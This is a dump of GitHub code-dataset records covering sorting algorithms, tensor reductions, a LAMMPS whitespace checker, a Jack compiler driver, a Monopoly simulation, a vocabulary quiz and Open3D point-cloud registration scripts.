arr2[secondPointer]:\n mergedList.append(arr1[firstPointer])\n firstPointer += 1\n else:\n mergedList.append(arr2[secondPointer])\n secondPointer += 1\n # 2 grubun Merge işlemi yapılırken en kucuk değer en basta olmak üzere yapılır\n # ve 2 diziden birinde en büyük değer yerleştirilmeyebilir.\n # çünkü 2 grubun en son 
indekslerindeki elemanlardan kücük olanı mergeList e yerleştirilince, her 2 dizinin pointer larından biri yukarıdaki koşulu saglamadıgı için\n # son eleman yerleştirilmeden işlem biter. Bu nedenle asagıda son elemanı yerleştirmek için yapılır.\n while firstPointer < len(arr1):\n mergedList.append(arr1[firstPointer])\n firstPointer += 1\n while secondPointer < len(arr2):\n mergedList.append(arr2[secondPointer])\n secondPointer += 1\n return mergedList\n\n def mergeSort(self, arr: [int]):\n # Exit condition\n # Bu recursive elemanlar birer tane kalana kadar calısır. Daha sonra merge icerisine sokar.\n if len(arr) == 1: # Tek eleman varsa sıralı dizi denebilir.\n return arr\n midPoint = int(len(arr) // 2)\n leftPart = arr[:midPoint] # bir dizinin orta noktasından soldaki değerleri almak icin.\n rightPart = arr[midPoint:] # bir dizinin orta noktasından sağındaki değerleri almak icin.\n return self.merge(self.mergeSort(leftPart), self.mergeSort(rightPart))\n\n # Quick Sort\n def pivot(self, arr: [int], pivotIndex, endIndex):\n swapIndex = pivotIndex\n for i in range(pivotIndex + 1, endIndex + 1): # dizinin tüm elemanlarına ulaşabilmek için endpoint +1 yapıldı.\n if arr[i] < arr[pivotIndex]:\n swapIndex += 1\n arr[swapIndex], arr[i] = arr[i], arr[swapIndex]\n arr[pivotIndex], arr[swapIndex] = arr[swapIndex], arr[pivotIndex]\n return swapIndex\n\n def quickSort(self, arr: [int], leftPointer= 0, rightPointer= None):\n if rightPointer == None:\n rightPointer = len(arr) -1\n if leftPointer < rightPointer:\n swapIndex = self.pivot(arr, leftPointer, rightPointer)\n self.quickSort(arr, leftPointer,swapIndex -1)\n self.quickSort(arr, swapIndex+1, rightPointer)\n return arr\n\n #Heapify\n def heapify(self, arr: [int], n, i):\n largest = i\n leftInd = 2 * i + 1\n rightInd = 2 * i + 2\n # n --> dizi içindeki eleman sayısı\n if leftInd < n and arr[largest] < arr[leftInd]:\n largest = leftInd\n\n if rightInd < n and arr[largest] < arr[rightInd]:\n largest = rightInd\n\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n self.heapify(arr, n, largest)\n\n # Heap Sort\n def heapSort(self, arr: [int]):\n n = len(arr)\n\n # MAX-HEAP\n for i in range(n, -1, -1):\n self.heapify(arr, n, i)\n\n # Swap\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n self.heapify(arr, i, 0)\n return arr\n\n\n\n\n\nmyArr = [10, 3, 4, 45, 65, 34, 54, 0, 1]\nsorting = SortingAlgorithms()\nprint(sorting.bubbleSort(myArr))\nprint(sorting.selectionSort(myArr))\nprint(sorting.insertionSort(myArr))\nprint(sorting.mergeSort(myArr))\nprint(sorting.quickSort(myArr))\nprint(\"heap Sort: \", sorting.heapSort(myArr))\n","repo_name":"BaranDgn/DataStructureStudies","sub_path":"SortingAlgorithm/SortingAlgorithms.py","file_name":"SortingAlgorithms.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72452869704","text":"import operator\nfrom typing import Callable, Union\nfrom pyskip.index import take\nfrom pyskip.manipulate import flatten, squeeze\nfrom pyskip.tensor import Scalar, Tensor\n\n\ndef reduce(\n op: Callable[[Scalar, Scalar], Scalar],\n t: Tensor,\n axis: int = None,\n keepdims=False,\n) -> Union[Tensor, Scalar]:\n assert len(t) > 0\n if axis is None:\n return reduce(op, flatten(t), axis=0, keepdims=keepdims)\n assert 0 <= axis < len(t.shape)\n if len(t) == 1:\n return t if keepdims else t.item()\n if t.shape[axis] == 1:\n return t if keepdims else squeeze(t)\n else:\n n = t.shape[axis]\n if n % 2 == 1:\n 
last = take(t, slice(-1, n), axis)\n if len(t.shape) == 1:\n last = last.item()\n\n return op(reduce(op, take(t, slice(-1), axis)), last)\n else:\n lo = take(t, slice(0, n, 2), axis)\n hi = take(t, slice(1, n, 2), axis)\n return reduce(op, op(lo, hi), axis, keepdims)\n\n\ndef add(t: Tensor, axis: int = None, keepdims=False) -> Tensor:\n if t.empty():\n return t.dtype(0)\n return reduce(operator.add, t, axis, keepdims)\n\n\ndef mul(t: Tensor, axis: int = None, keepdims=False) -> Tensor:\n if t.empty():\n return t.dtype(1)\n return reduce(operator.mul, t, axis, keepdims)\n\n\n# Convenience aliases for reduction operators\nsum = add\nprod = mul\n","repo_name":"turtlesoupy/pyskip","sub_path":"src/pyskip/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"25865132369","text":"#!/usr/bin/env python3\n# Utility for detecting and fixing whitespace issues in LAMMPS\n#\n# Written by Richard Berger (Temple University)\nfrom __future__ import print_function\nimport sys\n\nif sys.version_info.major < 3:\n sys.exit('This script must be run with Python 3.5 or later')\n\nif sys.version_info.minor < 5:\n sys.exit('This script must be run with Python 3.5 or later')\n\nimport os\nimport glob\nimport re\nimport yaml\nimport argparse\nimport shutil\n\nDEFAULT_CONFIG = \"\"\"\nrecursive: true\ninclude:\n - cmake/**\n - doc\n - doc/src/**\n - fortran/**\n - python/**\n - src/**\n - lib/**\n - tools/coding_standard\n - tools/python\n - tools/lammps-gui\n - unittest/**\nexclude:\n - lib/colvars/Install.py\n - lib/gpu/geryon/file_to_cstr.sh\n - lib/hdnnp\n - lib/kim\n - lib/kokkos\n - lib/latte\n - lib/machdyn\n - lib/mdi\n - lib/mscg\n - lib/pace\n - lib/plumed\n - lib/quip\n - lib/scafacos\n - lib/voronoi\n - src/Make.sh\npatterns:\n - \"*.c\"\n - \"*.cmake\"\n - \"*.cpp\"\n - \"*.h\"\n - \"*.md\"\n - \"*.py\"\n - \"*.rst\"\n - \"*.sh\"\n - \"*.f90\"\n - \".gitignore\"\n - \"README\"\n - \"requirements.txt\"\n\"\"\"\n\ndef check_trailing_whitespace(f):\n pattern = re.compile(r'[^\\n]*\\s+\\n$')\n last_line = \"\\n\"\n lineno = 1\n errors = set()\n\n for line in f:\n if pattern.match(line):\n errors.add(lineno)\n last_line = line\n lineno += 1\n\n return errors, last_line\n\ndef check_tabs(f):\n pattern = re.compile(r'[^\\n]*\\t+[^n]*\\n$')\n lineno = 1\n errors = set()\n\n for line in f:\n if pattern.match(line):\n errors.add(lineno)\n lineno += 1\n return errors\n\ndef check_file(path):\n encoding = 'UTF-8'\n last_line = \"\\n\"\n whitespace_errors = set()\n tab_errors = set()\n try:\n with open(path, 'r') as f:\n whitespace_errors, last_line = check_trailing_whitespace(f)\n except UnicodeDecodeError:\n encoding = 'ISO-8859-1'\n try:\n with open(path, 'r', encoding=encoding) as f:\n whitespace_errors, last_line = check_trailing_whitespace(f)\n except Exception:\n encoding = 'unknown'\n\n try:\n with open(path, 'r') as f:\n tab_errors = check_tabs(f)\n except UnicodeDecodeError:\n encoding = 'ISO-8859-1'\n try:\n with open(path, 'r', encoding=encoding) as f:\n tab_errors = check_tabs(f)\n except Exception:\n encoding = 'unknown'\n\n return {\n 'tab_errors': tab_errors,\n 'whitespace_errors': whitespace_errors,\n 'encoding': encoding,\n 'eof_error': not last_line.endswith('\\n')\n }\n\ndef fix_file(path, check_result):\n newfile = path + \".modified\"\n tab_pat = re.compile(r'^([^\\t]*)(\\t+)(.*)$')\n with open(newfile, 'w', encoding='UTF-8') as out:\n with open(path, 'r', 
encoding=check_result['encoding']) as src:\n for line in src:\n match = tab_pat.match(line)\n if match:\n # compute number of blanks assuming 8 character tab setting\n num = 8*len(match.group(2))-len(match.group(1))%8\n line = match.group(1) + \" \"*num + match.group(3)\n print(line.rstrip(), file=out)\n shutil.copymode(path, newfile)\n shutil.move(newfile, path)\n\ndef check_folder(directory, config, fix=False, verbose=False):\n success = True\n files = []\n\n for base_path in config['include']:\n for pattern in config['patterns']:\n path = os.path.join(directory, base_path, pattern)\n files += glob.glob(path, recursive=config['recursive'])\n for exclude in config['exclude']:\n files = [f for f in files if not f.startswith(os.path.join(directory,exclude))]\n\n for f in files:\n path = os.path.normpath(f)\n\n if verbose:\n print(\"Checking file:\", path)\n\n result = check_file(path)\n\n has_resolvable_errors = False\n\n for lineno in result['whitespace_errors']:\n print(\"[Error] Trailing whitespace @ {}:{}\".format(path, lineno))\n has_resolvable_errors = True\n\n for lineno in result['tab_errors']:\n print(\"[Error] Tab @ {}:{}\".format(path, lineno))\n has_resolvable_errors = True\n\n if result['eof_error']:\n print(\"[Error] Missing newline at end of file @ {}\".format(path))\n has_resolvable_errors = True\n\n if result['encoding'] == 'unknown':\n print(\"[Error] Unknown text encoding @ {}\".format(path))\n has_resolvable_errors = False\n success = False\n elif result['encoding'] == 'ISO-8859-1':\n print(\"[Error] Found ISO-8859-1 encoding instead of UTF-8 @ {}\".format(path))\n has_resolvable_errors = True\n\n if has_resolvable_errors:\n if fix:\n print(\"Applying automatic fixes to file:\", path)\n fix_file(path, result)\n else:\n success = False\n\n return success\n\ndef main():\n parser = argparse.ArgumentParser(description='Utility for detecting and fixing whitespace issues in LAMMPS')\n parser.add_argument('-c', '--config', metavar='CONFIG_FILE', help='location of a optional configuration file')\n parser.add_argument('-f', '--fix', action='store_true', help='automatically fix common issues')\n parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')\n parser.add_argument('DIRECTORY', help='directory that should be checked')\n args = parser.parse_args()\n lammpsdir = os.path.abspath(os.path.expanduser(args.DIRECTORY))\n\n if args.config:\n with open(args.config, 'r') as cfile:\n config = yaml.load(cfile, Loader=yaml.FullLoader)\n else:\n config = yaml.load(DEFAULT_CONFIG, Loader=yaml.FullLoader)\n\n if not check_folder(lammpsdir, config, args.fix, args.verbose):\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lammps/lammps","sub_path":"tools/coding_standard/whitespace.py","file_name":"whitespace.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","stars":1860,"dataset":"github-code","pt":"81"} +{"seq_id":"16758543473","text":"from JackTokenizer import JackTokenizer\nfrom CompilationEngine import CompilationEngine\nimport sys\nimport os\nimport glob\n\nclass JackCompiler():\n @classmethod\n def run(cls, input_file, output_file):\n tokenizer = JackTokenizer(input_file)\n compiler = CompilationEngine(tokenizer, output_file)\n compiler.compile_class()\n\n @classmethod\n def output_file_for(cls, input_file, ext_name='.vm'):\n file_name = os.path.basename(input_file).split(\".\")[0]\n dir_name = os.path.dirname(input_file).replace('./', '')\n # create subdirectory for compiled\n try:\n 
os.mkdir(\"./compiled/{}\".format(dir_name))\n except OSError:\n print(\"res directory already exists. continuing\")\n\n # for testing locally\n return \"./compiled/{}/{}{}\".format(dir_name, file_name, ext_name)\n # actual format expected for Coursera grader\n # return dir_name + \"/\" + file_name + ext_name\n\nif __name__ == \"__main__\" and len(sys.argv) == 2:\n arg = sys.argv[1]\n\n # determine output file names\n if os.path.isfile(arg):\n files = [arg]\n elif os.path.isdir(arg):\n jack_path = os.path.join(arg, \"*.jack\")\n files = glob.glob(jack_path)\n\n # create output directory - MAY NEED TO REMOVE\n try:\n os.mkdir(\"./compiled\")\n except OSError:\n print(\"output directory already exists. continuing\")\n\n for input_file_name in files:\n output_file_name = JackCompiler.output_file_for(input_file_name)\n output_file = open(output_file_name, 'w')\n input_file = open(input_file_name, 'r')\n JackCompiler.run(input_file, output_file)\n","repo_name":"EDalSanto/Nand2Tetris","sub_path":"projects/11/source/JackCompiler.py","file_name":"JackCompiler.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"25979037642","text":"#モノポリーで各マスに止まる確率をシミュレーションで計算する\nimport random\nimport time\nnumber_of_players = 3 #プレーヤーの数\nPlayers = [0]*number_of_players #プレーヤー位置の変数\nProbability = [0]*40 #確率計算用\ngame_length = 20 #ダイスを振る回数\n\n#ダイスによるゲーム進行\ndef dice():\n number = 0\n number += random.randint(1,6)\n time.sleep(0.01)\n number += random.randint(1,6)\n return number\n\n#チャンス判定\ndef isChance(location):\n if location == 7 or location == 22 or location == 36:\n return True\n\n#チャンス処理\ndef doChance(location):\n card = 0\n card = random.randint(1,16)\n if card == 1: #ボードウォークに進む\n return 39\n elif card == 2: #GOに進む\n return 0\n elif card == 3: #刑務所にいく\n return 10\n elif card == 4: #リーディング鉄道に進む\n return 5\n elif card == 5: #イリノイ通りに進む\n return 24\n elif card == 6: #セントチャールズプレースに進む\n return 11\n elif card == 7: #次の水道会社か電力会社に進む\n if location == 22:\n return 28\n else:\n return 12\n elif card == 8 or card == 9: #次の鉄道まで進む\n if location == 7:\n return 15\n elif location == 22:\n return 25\n elif location == 36:\n return 5\n else:\n return location\n\nprint(\"ゲーム開始\")\nincrease_counter = 0\nfor i in range(game_length):\n for j in range(number_of_players):\n Dice = dice()\n #print(Dice)\n Players[j] += Dice\n if Players[j] > 39:\n Players[j] -= 40\n Probability[Players[j]] += 1\n if Players[j] == 30:\n Players[j] = 1\n Probability[Players[j]] += 1\n increase_counter += 1\n if isChance(Players[j]):\n Players[j] = doChance(Players[j])\n if not(Players[j] == 7 or Players[j] == 22 or Players[j] == 36):\n Probability[Players[j]] += 1\n increase_counter += 1\n\nprint(\"結果発表\")\na = 0\nfor i in Probability:\n i = i/(game_length*number_of_players + increase_counter)*100\n print(str(a)+\"番のマス:\"+str(i)+\"%\")\n a += 1\n","repo_name":"isol178/pythonPractice","sub_path":"monopoly.py","file_name":"monopoly.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18615361700","text":"import os\nimport numpy as np\n\n\ndef center_iou(box1, box2):\n x1, y1, w1, h1 = box1\n x2, y2, w2, h2 = box2\n\n #计算每个框的上下左右边线的坐标\n y1_max = y1 + h1/2\n x1_max = x1 + w1/2\n y1_min = y1 - h1/2\n x1_min = x1 - w1/2\n\n y2_max = y2 + h2/2\n x2_max = x2 + w2/2\n y2_min = y2 - h2/2\n x2_min = x2 - w2/2\n\n #上取小下取大,右取小左取大\n xx1 = np.max([x1_min, x2_min])\n 
yy1 = np.max([y1_min, y2_min])\n xx2 = np.min([x1_max, x2_max])\n yy2 = np.min([y1_max, y2_max])\n\n #计算各个框的面积\n area1 = (x1_max-x1_min) * (y1_max-y1_min) \n area2 = (x2_max-x2_min) * (y2_max-y2_min)\n\n #计算相交的面积\n inter_area = (np.max([0, xx2-xx1])) * (np.max([0, yy2-yy1]))\n #计算IoU\n iou = inter_area / (area1+area2-inter_area)\n return iou\n\n\ndef lightjudge_IOU(fread, light_label, light_box, iou_thres):\n fread.seek(0)\n while True: #读取文件内容\n line = fread.readline() #按行读取内容\n if len(line) > 0: #当该行为空,表明已经读取到文件末尾,退出循环\n detect_content = line.split()#将它们分开\n detect_label = int(detect_content[0])\n detect_box = list(map(float, detect_content[1:]))\n if center_iou(light_box, detect_box) > iou_thres:\n if light_label == detect_label:\n return True\n else:\n break\n return False\n\n\ndef judge_IOU(pic_info, path):\n fread = open(path, 'r')\n for light_info in pic_info:\n if lightjudge_IOU(fread, light_info[0], light_info[1:], 0.5) == 0:\n fread.close()\n return False\n fread.close()\n return True\n\ndef judge_seq(pic_info, path):\n detect = []\n fread = open(path, 'r')\n while True:\n line = fread.readline()\n if len(line) > 0:\n detect.append([float(i) for i in line.split()])\n else:\n break\n \n detect.sort(key=lambda ele: ele[1])\n pic_info.sort(key=lambda ele: ele[1])\n\n detect_label = ''\n pic_label = ''\n for label in detect:\n detect_label = detect_label + str(int(label[0]))\n for label in pic_info:\n pic_label = pic_label + str(int(label[0]))\n \n if detect_label.find(pic_label) == -1:\n return False\n else:\n return True\n\n\nfpath = r\"E:\\code\\Server_Room_Judge\\2023_02_17\\labels\\2023_02_17_18_18_07.txt\" #检测结果文件的路径\npic_info = [[0, 0.51, 0.52, 0.03, 0.04],\n [1, 0.45, 0.51, 0.03, 0.04],\n [3, 0.39, 0.51, 0.03, 0.04]]\nif judge_seq(pic_info, fpath):\n print('True')\nelse:\n print('False')\n","repo_name":"byzhang17/Yolov5_detect","sub_path":"yolov5-v8.0/Judge.py","file_name":"Judge.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36672433152","text":"from random import randint\n\ndef CodingMessage2(Message, key):\n Lst=[]\n i=0\n newStr=\"\"\n #Splitting Message in List and encoding\n Lst.append(str(key)+\"{\")\n while(i dict:\n \"\"\"\n Загружает вопросы из файла формата json и возвращает словарь\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f_in:\n return json.load(f_in)\n\n\ndef show_field(game_field: dict) -> None:\n \"\"\"\n Вывод на экран игрового поля\n \"\"\"\n topics = []\n for topic in game_field.keys():\n topics.append(topic)\n\n max_topic_length = len(max(topics))\n placeholder = ' ' * 3\n\n for topic, topic_questions in game_field.items():\n print(topic.ljust(max_topic_length), end=' ')\n for score, question in topic_questions.items():\n print(score if not question['asked'] else placeholder, end=placeholder)\n print()\n\n\ndef parse_input(string: str, game_field: dict) -> bool | list[str]:\n \"\"\"\n Проверка введённых пользователем данных на соответствие формату и наличие вопроса такой категории и стоимости на\n игровом поле\n \"\"\"\n data = string.lower().capitalize().strip().split()\n # проверяем, что введено 2 значения\n if len(data) != 2:\n return False\n # проверяем, что введённая категория есть в перечне категорий\n if data[0] not in game_field.keys():\n return False\n # проверяем, что введённая стоимость вопроса существует\n if data[1] not in game_field[data[0]].keys():\n return False\n # проверяем, что такой вопрос ещё не задавали\n if 
game_field[data[0]][data[1]]['asked']:\n return False\n return data\n\n\ndef show_question(game_field: dict, q: list, statistics: dict) -> None:\n \"\"\"\n Показывает вопрос по заданной категории и стоимости, проверяет правильность введённого ответа и подсчитывает\n статистику\n \"\"\"\n cur_question = game_field[q[0]][q[1]]\n user_answer = input(f'Слово {cur_question[\"question\"]} в переводе означает ...\\n').lower()\n cur_question['asked'] = True\n if user_answer == cur_question['answer']:\n statistics['points'] += int(q[1])\n statistics['correct'] += 1\n print(f\"Верно, +{q[1]} очков. Ваш счет: {statistics['points']}\\n\")\n else:\n statistics['points'] -= int(q[1])\n statistics['incorrect'] += 1\n print(f\"Неверно, на самом деле: {cur_question['answer'].capitalize()}. -{q[1]} очков. \"\n f\"Ваш счет: {statistics['points']}\\n\")\n\n\ndef show_stats(statistics: dict) -> None:\n \"\"\"\n Показывает результаты после окончания игры\n \"\"\"\n print('У нас закончились вопросы!\\n')\n print(f'Ваш счет: {statistics[\"points\"]}')\n print(f'Верных ответов: {statistics[\"correct\"]}')\n print(f'Неверных ответов: {statistics[\"incorrect\"]}')\n\n\ndef save_results_to_file(statistics: dict, filename: str = 'data/results.json') -> None:\n \"\"\"\n Сохраняет результат игры в файл с общим списком результатов в формате json\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f_in:\n if os.stat(filename).st_size == 0: # если файл пуст\n total_stat = [statistics]\n else:\n total_stat = json.load(f_in)\n total_stat.append(statistics)\n\n with open(filename, 'w', encoding='utf-8') as f_out:\n json.dump(total_stat, f_out, indent=2)\n\n\nif __name__ == '__main__':\n cur_stat = {\n 'points': 0,\n 'correct': 0,\n 'incorrect': 0\n }\n\n questions = load_questions()\n\n number_of_questions = 0\n for val in questions.values():\n number_of_questions += len(val.keys())\n\n for _ in range(number_of_questions):\n show_field(questions)\n while True:\n user_input = input('\\nВведите вопрос и стоимость: ')\n parsing_res = parse_input(user_input, questions)\n if parsing_res:\n break\n print('Такого вопроса нет, попробуйте еще раз!')\n show_question(questions, parsing_res, cur_stat)\n\n show_stats(cur_stat)\n save_results_to_file(cur_stat)\n","repo_name":"alexs2011/Tasks_Python","sub_path":"SkyPro/Урок 7. Вложенные структуры. 
Домашнее задание/task_01.py","file_name":"task_01.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695265794","text":"#!/usr/bin/python3\n\"\"\"\nGiven an integer array, find three numbers whose product is maximum and output\nthe maximum product.\n\nExample 1:\n\nInput: [1,2,3]\nOutput: 6\n\n\nExample 2:\n\nInput: [1,2,3,4]\nOutput: 24\n\n\nNote:\n\nThe length of the given array will be in range [3,104] and all elements are in\nthe range [-1000, 1000].\nMultiplication of any three numbers in the input won't exceed the range of\n32-bit signed integer.\n\"\"\"\nimport heapq\n\nfrom typing import List\n\n\nclass Solution:\n def maximumProduct(self, nums: List[int]) -> int:\n \"\"\"\n heapq nlargest nsmallest\n \"\"\"\n mxes = heapq.nlargest(3, nums)\n mns = heapq.nsmallest(3, nums)\n return max(\n mxes[0] * mxes[1] * mxes[2],\n mns[0] * mns[1] * mxes[0],\n )\n","repo_name":"algorhythms/LeetCode","sub_path":"628 Maximum Product of Three Numbers.py","file_name":"628 Maximum Product of Three Numbers.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"9570844553","text":"import numpy as np\nimport open3d as o3d\nimport time\nimport copy\nfrom itertools import permutations\n\n\ndef draw_registration_result(source, target, transformation):\n source_temp = copy.deepcopy(source)\n target_temp = copy.deepcopy(target)\n source_temp.paint_uniform_color([1, 0.706, 0])\n target_temp.paint_uniform_color([0, 0.651, 0.929])\n source_temp.transform(transformation)\n o3d.visualization.draw_geometries([source_temp, target_temp],\n zoom=0.4559,\n front=[0.6452, -0.3036, -0.7011],\n lookat=[1.9892, 2.0208, 1.8945],\n up=[-0.2779, -0.9482, 0.1556])\n\ndef preprocess_point_cloud(pcd, voxel_size):\n print(\":: Downsample with a voxel size %.3f.\" % voxel_size)\n pcd_down = pcd.voxel_down_sample(voxel_size)\n\n radius_normal = voxel_size * 2\n print(\":: Estimate normal with search radius %.3f.\" % radius_normal)\n pcd_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))\n\n radius_feature = voxel_size * 5\n print(\":: Compute FPFH feature with search radius %.3f.\" % radius_feature)\n pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcd_down,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))\n return pcd_down, pcd_fpfh\n\ndef execute_fast_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 0.5\n print(\":: Apply fast global registration with distance threshold %.3f\" \\\n % distance_threshold)\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distance_threshold))\n return result\n\ndef execute_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 1.5\n print(\":: RANSAC registration on downsampled point clouds.\")\n print(\" Since the downsampling voxel size is %.3f,\" % voxel_size)\n print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh, True,\n 
distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 3, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(\n 0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(10000, 0.9999))\n print('The fitness is {} \\n\\n'.format(result.fitness))\n return result\n\ndef color_registration(source, target, iter, radius):\n\n current_transformation = np.identity(4)\n print(\"3-1. Downsample with a voxel size %.2f\" % radius)\n source_down = source.voxel_down_sample(radius)\n target_down = target.voxel_down_sample(radius)\n\n print(\"3-2. Estimate normal.\")\n source_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius * 2, max_nn=30))\n target_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius * 2, max_nn=30))\n\n print(\"3-3. Applying colored point cloud registration\")\n result_icp = o3d.pipelines.registration.registration_colored_icp(\n source_down, target_down, radius, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=iter))\n current_transformation = result_icp.transformation\n print(result_icp)\n return result_icp\n\ndef display_inlier_outlier(cloud, ind):\n inlier_cloud = cloud.select_by_index(ind)\n outlier_cloud = cloud.select_by_index(ind, invert=True)\n\n print(\"Showing outliers (red) and inliers (gray): \")\n outlier_cloud.paint_uniform_color([1, 0, 0])\n inlier_cloud.paint_uniform_color([0.8, 0.8, 0.8])\n o3d.visualization.draw_geometries([inlier_cloud, outlier_cloud],\n zoom=0.3412,\n front=[0.4257, -0.2125, -0.8795],\n lookat=[2.6172, 2.0475, 1.532],\n up=[-0.0694, -0.9768, 0.2024])\n\ndef pick_points(pcd):\n print(\"\")\n print(\n \"1) Please pick at least three correspondences using [shift + left click]\"\n )\n print(\" Press [shift + right click] to undo point picking\")\n print(\"2) After picking points, press 'Q' to close the window\")\n vis = o3d.visualization.VisualizerWithEditing()\n vis.create_window()\n vis.add_geometry(pcd)\n vis.run() # user picks points\n vis.destroy_window()\n print(\"\")\n return vis.get_picked_points()\n\ndef interactive_registration(source, target, picked_id_source, picked_id_target, \n transformation_name=None):\n assert (len(picked_id_source) >= 3 and len(picked_id_target) >= 3)\n assert (len(picked_id_source) == len(picked_id_target))\n corr = np.zeros((len(picked_id_source), 2))\n corr[:, 0] = picked_id_source\n corr[:, 1] = picked_id_target\n\n # estimate rough transformation using correspondences\n print(\"Compute a rough transform using the correspondences given by user\")\n p2p = o3d.pipelines.registration.TransformationEstimationPointToPoint()\n trans_init = p2p.compute_transformation(source, target,\n o3d.utility.Vector2iVector(corr))\n\n # point-to-point ICP for refinement\n print(\"Perform point-to-point ICP refinement\")\n threshold = 0.03 # 3cm distance threshold\n reg_p2p = o3d.pipelines.registration.registration_icp(\n source, target, threshold, trans_init,\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n draw_registration_result(source, target, reg_p2p.transformation)\n print(\"registration result:\", reg_p2p.transformation)\n if transformation_name is not None:\n np.save(transformation_name, reg_p2p.transformation)\n return reg_p2p\n\ndef 
load_pc_dict(pcd_dir, keys_list, form='npy'):\n pcd_dict = { k:o3d.geometry.PointCloud() for k in keys_list }\n for key in keys_list:\n if form == 'npy':\n pcd_fn = pcd_dir+'/'+key+'.npy'\n print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n print(pcd_fn)\n pcd_ary = np.load(pcd_fn)\n print(\"pcd ary shape:\", pcd_ary.shape)\n pcd_dict[key].points = o3d.utility.Vector3dVector(pcd_ary[:, :3])\n pcd_dict[key].colors = o3d.utility.Vector3dVector(pcd_ary[:, 3:])\n \n points = np.asarray(pcd_dict[key].points)\n if(key == 'torso'):\n pcd_dict[key] = pcd_dict[key].select_by_index(np.where(points[:,2] < 3.0)[0])\n else:\n pcd_dict[key] = pcd_dict[key].select_by_index(np.where(np.logical_and(points[:,2] < 3.0,points[:,2] > 1.5))[0])\n\n print(np.max(points,axis = 0))\n \n elif form == 'ply':\n pcd_fn = pcd_dir+'/'+key+'.ply'\n pcd_dict[key] = o3d.io.read_point_cloud(pcd_fn)\n return pcd_dict\n\nif __name__ == '__main__':\n\n pcd_dir = 'Calibration/data/point_cloud'\n # keys_list = ['realsense_left','realsense_right','realsense_torso']\n # pcd_dict = load_pc_dict(pcd_dir, keys_list)\n keys_list = ['left','right','torso']\n pcd_dict = load_pc_dict(pcd_dir, keys_list, 'ply')\n \n o3d.visualization.draw_geometries([pcd for k, pcd in pcd_dict.items()])\n\n # preprocess point cloud\n voxel_size = 0.01\n downsampled_results = {}\n for key in keys_list:\n res = preprocess_point_cloud(pcd_dict[key], voxel_size)\n downsampled_results.update({key:res})\n\n # transformations = {}\n # for key_comb in permutations(keys_list,2):\n # key1,key2 = key_comb\n # print(\"find transformtion:\", key_comb)\n # source_down,source_fpfh = downsampled_results[key1]\n # target_down,target_fpfh = downsampled_results[key2]\n # o3d.visualization.draw_geometries([source_down,target_down])\n\n # result = execute_global_registration(source_down, target_down, \n # source_fpfh, target_fpfh, voxel_size)\n # transformations.update({key_comb:result.transformation})\n # result = color_registration(source_down,target_down,iter = 1000,radius = voxel_size)\n # transformations.update({key_comb:result})\n \n # remove outliers from the original point cloud is time-consuming\n for k, pcd in pcd_dict.items():\n cl, ind = pcd.remove_statistical_outlier(nb_neighbors=20,\n std_ratio=2.0)\n display_inlier_outlier(pcd, ind)\n pcd_dict[k] = pcd.select_by_index(ind)\n\n # manual registration\n # voxel_size = 0.03\n # for k, pcd in pcd_dict.items():\n # pcd = pcd.voxel_down_sample(voxel_size)\n # cl, ind = pcd.remove_statistical_outlier(nb_neighbors=20,\n # std_ratio=2.0)\n # display_inlier_outlier(pcd, ind)\n # pcd_dict[k] = pcd.select_by_index(ind)\n \n trans_dir = 'Calibration/data/extrinsics'\n\n # manual registration\n picked_left = pick_points(pcd_dict['left'])\n picked_right = pick_points(pcd_dict['right'])\n interactive_registration(pcd_dict['left'], \n pcd_dict['right'], \n picked_left, picked_right, \n trans_dir+'/left2right.npy')\n\n # picked_left = pick_points(pcd_dict['left'])\n # picked_torso = pick_points(pcd_dict['torso'])\n # 